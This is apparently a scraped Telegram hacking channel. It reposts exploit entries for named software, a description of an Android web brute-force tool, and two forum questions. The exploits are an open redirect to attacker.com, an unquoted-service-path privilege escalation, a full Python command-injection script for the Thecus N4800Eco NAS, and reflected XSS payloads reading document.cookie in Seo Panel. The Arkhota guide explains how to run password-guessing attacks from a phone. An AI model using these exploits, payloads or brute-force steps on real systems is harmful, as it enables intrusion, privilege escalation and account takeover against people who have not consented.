Hacking Articles Tips Tricks Videos Tutorials
467 subscribers
65.6K photos
15 videos
157 files
131K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Products.PluggableAuthService 2.6.0 Open Redirect

https://4.bp.blogspot.com/-yl8JZs3kPK0/WWlvOF1SUeI/AAAAAAAAIMk/jv5-1ECzklsqpq4rMFWFx2wFFGh-Q9GlwCLcBGAs/s1600/h24.png
Products.PluggableAuthService version 2.6.0 suffers from an open redirection vulnerability.

MD5 | 4b70535ef74ac82dc36e19572d6af760

Download
# Exploit Title: Products.PluggableAuthService 2.6.0 - Open Redirect
# Exploit Author: Piyush Patil
# Affected Component: Pluggable Zope authentication/authorization framework
# Component Link: https://pypi.org/project/Products.PluggableAuthService/
# Version: < 2.6.1
# CVE: CVE-2021-21337
# Reference: https://github.com/zopefoundation/Products.PluggableAuthService/security/advisories/GHSA-p44j-xrqg-4xrr
--------------------------Proof of Concept-----------------------

1- Goto https://localhost/login
2- Turn on intercept and click on the login
3- Change "came_from" parameter value to https://attacker.com
4- User will be redirected to an attacker-controlled website.

Fix: pip install "Products.PluggableAuthService>=2.6.1"


Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Intel Audio Service 01.00.1080.0 Unquoted Service Path

https://2.bp.blogspot.com/-209TE5VbJR0/WWlvlKjkdxI/AAAAAAAAIQ8/gHk0ahoua8cqyTuIh5dYs6hAVa_ekYeoACLcBGAs/s1600/hack_img.png
Intel Audio Service version 01.00.1080.0 suffers from an unquoted service path vulnerability.

MD5 | 1832bae6f7375ed5c911255279576ec0

Download
# Exploit Title: Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path
# Date: 06-01-2021
# Exploit Author: Geovanni Ruiz
# Vendor Homepage: https://www.intel.com
# Software Version: 01.00.1080.0
# File Version: 1.00.1080.0
# Tested on: Microsoft® Windows 10 Home Single Language 10.0.19042 x64 es
# Vulnerability Type: Unquoted Service Path
# 1. To find the unquoted service path vulnerability

C:\>wmic service where 'name like "%IntelAudioService%"' get name, displayname, pathname, startmode, startname

DisplayName Name PathName StartMode StartName
Intel(R) Audio Service IntelAudioService C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe Auto LocalSystem
# 2. To check service info:

C:\>sc qc "IntelAudioService"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: IntelAudioService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Intel(R) Audio Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

# 3. Exploit:

To exploit this vulnerability an attacker requires drop a malicious executable into the service path undetected by the OS in order
to gain SYSTEM privileges.

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Thecus N4800Eco Command Injection

https://4.bp.blogspot.com/-lQ2zJgiLTsU/WWlu34sMcWI/AAAAAAAAII4/mS7xceEZnmUYAvFeoaUiLc9JINHoDjNsACLcBGAs/s1600/h102.png
Thecus N4800Eco NAS server control panel suffers from a command injection vulnerability.

MD5 | ae4a89312d846301be09513febb070f1

Download
# Exploit Title: Thecus N4800Eco Nas Server Control Panel - Comand Injection
# Date: 01/06/2021
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: http://www.thecus.com/
# Software Link: http://www.thecus.com/product.php?PROD_ID=83
# Version: N4800Eco
# Description: https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection
#!/usr/bin/python3
import requests
import sys
import urllib3
# To fix SSL error that occurs when the script is started.
# 1- Open /etc/ssl/openssl.cnf file
# At the bottom of the file:
# [system_default_sect]
# MinProtocol = TLSv1.2
# CipherString = DEFAULT@SECLEVEL=2
# 2- Set value of MinProtocol as TLSv1.0
def readResult(s, target):
d = {
"fun": "setlog",
"action": "query",
"params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'
}
url = "http://" + target + "/adm/setmain.php"
resultReq = s.post(url, data=d, verify=False)
dict = resultReq.text.split()
print("[+] Reading system log...\n")
print(dict[5:8]) #change this range to read whole output of the command

def delUser(s, target, command):
d = {
"action": "delete",
"username": "$("+command+")"
}
url = "http://" + target + "/adm/setmain.php?fun=setlocaluser"
delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)

if 'Local User remove succeeds' in delUserReq.text:
print('[+] %s command was executed successfully' % command)
else:
print('[-] %s command was not executed!' %command)
sys.exit(1)
readResult(s, target)

def addUser(s, target, command):
d = {'batch_content': '%24('+command+')%2C22222%2C9999'}
url = "http://" + target + "/adm/setmain.php?fun=setbatch"
addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)

if 'Users and groups were created successfully.' in addUserReq.text:
print('[+] Users and groups were created successfully')
else:
print('[-] Users and groups were not created')
sys.exit(1)
delUser(s, target, command)

def login(target, username, password, command=None):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
s = requests.Session()
d = {
"&eplang": "english",
"p_pass": password,
"p_user": username,
"username": username,
"pwd": password,
"action": "login",
"option": "com_extplorer"
}
url = "http://" + target + "/adm/login.php"
loginReq = s.post(url, data=d, allow_redirects=False, verify=False)

if '"success":true' in loginReq.text:
print('[+] Authentication successful')
elif '"success":false' in loginReq.text:
print('[-] Authentication failed!')
sys.exit(1)
else:
print('[-] Something went wrong!')
sys.exit(1)
addUser(s, target, command)

def main(args):
if len(args) != 5:
print("usage: %s targetIp:port username password command" % (args[0]))
print("Example 192.168.1.13:80 admin admin id")
sys.exit(1)
login(target=args[1], username=args[2], password=args[3], command=args[4])
if __name__ == "__main__":
main(args=sys.argv)


Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Seo Panel 4.8.0 Cross Site Scripting

https://3.bp.blogspot.com/--aVxNCIn1VA/WWlvnVN-uzI/AAAAAAAAIRQ/ADDhvty6Qn8T3Zf1bX42ni77vOOnTgOQwCLcBGAs/s1600/hack_img5.png
Seo Panel version 4.8.0 suffers from multiple cross site scripting vulnerabilities.

MD5 | 8ad5fb98ff68e1b4ac68594baa474a3b

Download
# Exploit Title: Seo Panel 4.8.0 - 'search_name' Reflected XSS
# Date: 21-03-2021
# Exploit Author: Piyush Patil
# Vendor Homepage: https://www.seopanel.org/
# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
# Version: Seo Panel 4.8.0
# Tested on: Windows 10 and Kali
# CVE : CVE-2021-28417
-Description:
A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter.

-Payload used:
x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22

-Steps to reproduce:
1- Login to SEO admin panel
2- Add below line at the end:
http://localhost/archive.php?from_time=2021-03-08&order_col=name&order_val=DESC&report_type=website-search-reports&search_name=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&sec=viewWebsiteSearchSummary&to_time=2021-03-09&website_id=http%3a%2f%2fwww.example.com
3- Hover your mouse near to "CTR" field
-----------
# Exploit Title: Seo Panel 4.8.0 - 'category' Reflected XSS
# Date: 22-03-2021
# Exploit Author: Piyush Patil
# Vendor Homepage: https://www.seopanel.org/
# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
# Version: Seo Panel 4.8.0
# Tested on: Windows 10 and Kali
# CVE : CVE-2021-28418
-Description:
A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter.

-Payload used:
x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22

-Steps to reproduce:
1- Login to SEO admin panel
2- Visit:
http://localhost/settings.php?category=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
3- Hover your mouse to "Cancel" field

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Arkhota - A Web Brute Forcer For Android

http://4.bp.blogspot.com/-5kSXvnHN-rs/YLcmqfopoZI/AAAAAAAADVg/AcZgzUl0juAQYJ-WcALJqzD5JueIFb_1gCK4BGAYYCw/w640-h360/Arkhota_1_banner-721104.png What?Arkhota is a web (HTTP/S) brute forcer for Android. Why?A web brute forcer is always in a hacker's computer, for obvious reasons. Sometimes attacks require to be quick or/and with minimal device preparation. Also a phone takes less attention rather than a laptop/computer. For this situations here's Arkhota. DownloadYou can download APK from there. UsageExplanation is in order of objects in the APK from top to bottom. Banner* Banner, version & author

You can long click to version to see about page. Connection* URL (required)

An URL to make request.

* Body

You need to specify a body if you are going to make a POST request. Userlist / Wordlist* Userlist selector

Single: Sets a single username

Generate: Generates runtime with given options

Wordlists: Sets prepared wordlist

Custom wordlist: You can place your custom wordlist to /sdcard/ABF/

Then this selector will have it (if required permissions given.).

* Username box

You need to specify a username if you selected Single.

* Charset selectors

[W] You need to specify charset, min & max length to generate runtime.

If you selected Generate, checkboxes will help you to select._

* Prefix & Suffix

You can specify prefix & suffix to be added to your username It's same for the password part too.Configuration* Beep switch

Beeps if attack success.

* Fail/Success switch

Decides how to react connection response

* POST/GET switch

Decides type of connection

* User-Agent

_Sets user-agent for connection.

if "Original UA" set, then original user-agent set

Othervise given text will set to user-agent_ tip: It has autocomplete for several user-agents, all of them starts with "Mozilla", type and select one if you don't want to expose your original ua, but you don't know what to set* Timeout

Sets timeout for connection, in milliseconds

* Cookie

Sets cookie value for connection

* Regex (required)

Determines what to look in connection response

* Empty box

Tried username:password pairs & result will shown there.

* [W] Start

Starts attack! ImportantURL & Body: ^USER^& ^PASS^are placeholders for username and password. You need to place them in url or the body (depends what type you choose to connection)

Regex & Fail/Success switch: These two determines the result of the attack.

If switch points to "Fail", and if given regex found in the response, this means, this is a fail, continue to attack.

if switch points to "Success", and if given regex found in response, this means this is a success!, write result to empty box (in format "FOUND: username:password") and stop the attack.

Copying: Long click on the empty box will copy the content. if password found, it copies in username:passwordformat Otherwise copies whole content.

If attack is over and unsuccessful, it just stops at the last user:password. Screenshots & Videoshttp://4.bp.blogspot.com/-oIYSVKZ3hqw/YLcmqhP0FxI/AAAAAAAADVo/aP0XjSnQ5swEWfqXudTFKhjYlfNA9J5MACK4BGAYYCw/s320/Arkhota_2_1-721902.jpeg http://2.bp.blogspot.com/-mRTIWPVak_U/YLcmqhta5xI/AAAAAAAADVw/i-0gnOXmyGA2TB_COKNxyugY325vWH_rgCK4BGAYYCw/s320/Arkhota_3_2-722679.jpeg http://2.bp.blogspot.com/-zSKkHYq3t0c/YLcmq3-BQBI/AAAAAAAADV4/myYFDxzAybMB4nMT_99Kzj9ZXDHFrANZwCK4BGAYYCw/s320/Arkhota_4_3-723290.jpeg http://3.bp.blogspot.com/-j6PLyvN_ILE/YLcmrEPdBdI/AAAAAAAADWA/EAeCFOQKsKw7J9TPvAgiQDNazAU6seQmgCK4BGAYYCw/s320/Arkhota_5_4-723989.jpeg http://1.bp.blogspot.com/-knNZybufvv4/YLcmrY9uX8I/AAAAAAAADWI/Wd2Si_cypiUeTswEXfS5XQn23_cwQjvPwCK4BGAY[...]
Hacking Articles Tips Tricks Videos Tutorials
KitPloit - PenTest Tools! Arkhota - A Web Brute Forcer For Android http://4.bp.blogspot.com/-5kSXvnHN-rs/YLcmqfopoZI/AAAAAAAADVg/AcZgzUl0juAQYJ-WcALJqzD5JueIFb_1gCK4BGAYYCw/w640-h360/Arkhota_1_banner-721104.png What?Arkhota is a web (HTTP/S) brute forcer…
YCw/s320/Arkhota_6_5-724945.jpeg http://4.bp.blogspot.com/-UuRdbbCnU6k/YLcmrrPwJwI/AAAAAAAADWQ/09CWdN1XNsoWReIl4IH8FMm-M4NXusV7QCK4BGAYYCw/s320/Arkhota_7_6-725687.jpeg http://4.bp.blogspot.com/-s9ssDwmdxbM/YLcmrlgUiHI/AAAAAAAADWY/yBA7Ehx5dB4tyRz4S_SWpemW30yVO9C7QCK4BGAYYCw/s320/Arkhota_8_7-726634.jpeg http://2.bp.blogspot.com/-3yWjJiQNJus/YLcmr3AByZI/AAAAAAAADWg/TiwPdDTYa3YswhnMJeCIfmRD6R4ELHYmwCK4BGAYYCw/s320/Arkhota_9_8-727314.jpeg http://4.bp.blogspot.com/-vjUuGR06zKc/YLcmsGgiFOI/AAAAAAAADWo/SJraZbSWEzkUP4p0Hj1-dgCfD18W_CNnQCK4BGAYYCw/s320/Arkhota_10_9-728314.jpeg http://4.bp.blogspot.com/-_zev7MG90bE/YLcmsZL5dSI/AAAAAAAADWw/S1WWNVFywAo0rih8kM5ASpN6kld6RyStwCK4BGAYYCw/s320/Arkhota_11_10-729011.jpeg http://2.bp.blogspot.com/-KTj5X9enKEc/YLcmsdnnpTI/AAAAAAAADW4/OiKXH1IgZFc3FQ1Fjk61AvxOSSBoqsdzgCK4BGAYYCw/s320/Arkhota_12_pc-1-729786.png [W]arningRuntime changeable parametersEvery parameter editable during attack, but none of the parameters will changeable during attack, except two. "Fail/Success" and "Beep" switch.

This means: If you started the attack, and want to change a parameter (e.g charset), editing will not change anything, this changes applies after pressing start button. BUT If you started the attack with beep option on, and you want to change it. You don't need to re-start attack, just click on switch and it won't beep when attack success. About "Generate" & Custom wordlistsThe Generate option is NOT recommended Runtime generating & parsing is a really hard work for a phone. Also it's not stable, all possible words will be generated, but may not be sequential. If you really need to select it, keep everything minimum. If your phone freezes or crashes, you know selected options is not suitable your phone's processor.

Do NOT place big wordlists to /ABF/ directory. This will cause freezing & crashing.

And do NOT forget standard smartphones have far less processor power rather than a computer, this project is for small and quick attacks. About speedDepends on your speed of network & remote host. How to stop the attackThis version of Arkhota doesn't support "stopping the attack". BUT that doesn't mean you cannot stop. Just change "Fail/Success" switch to opposite direction and wait one more request. This will cause a false-positive on purpose to stop. Or You can simply close and re-open the application. PS: I know.. I know... This project gave me a headache, I didn't even try to put a stop button there.Download Arkhota

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
“Hacking” into my Dad’s computers

Not sure if this is the right place to go but may as well start here. My Dad passed away recently and so I’m trying to get into his various laptops and accounts. I am in some but not all and I have some of his passwords that he used over time but there’s always variations. My first step is to try to get into his main laptop. I’m wondering is there programs I can use to brute force his account based on the passwords I know, doesn’t seem to be a max number of tries. Thanks

Edit: Thanks for all your messages, sounds like the best method is to boot from USB and change admin rights to change the password, can’t say I know how to do it but should be able to after a bit of research. Thanks all for your messages.

Edit1: Should have mentioned it’s a windows computer, probably windows 10.

submitted by /u/dgpking
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Removing Company From Email Blacklist After Being Hacked

Hello, I've been at my current employer for about 8 months and we've had to use third party email systems such as gmail and yahoo because they were hacked prior to me being hired. Apparently there was some malware that would send out email spam using our internal email systems which caused it to be black listed.

Does anyone know how to fix being on an email blacklist? Changing email servers? Contacting the ISP? A lot of employees think it looks unprofessional not being able to use our own email system so I'm researching if it's possible to fix

Thank you

submitted by /u/DoubleAgent10
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video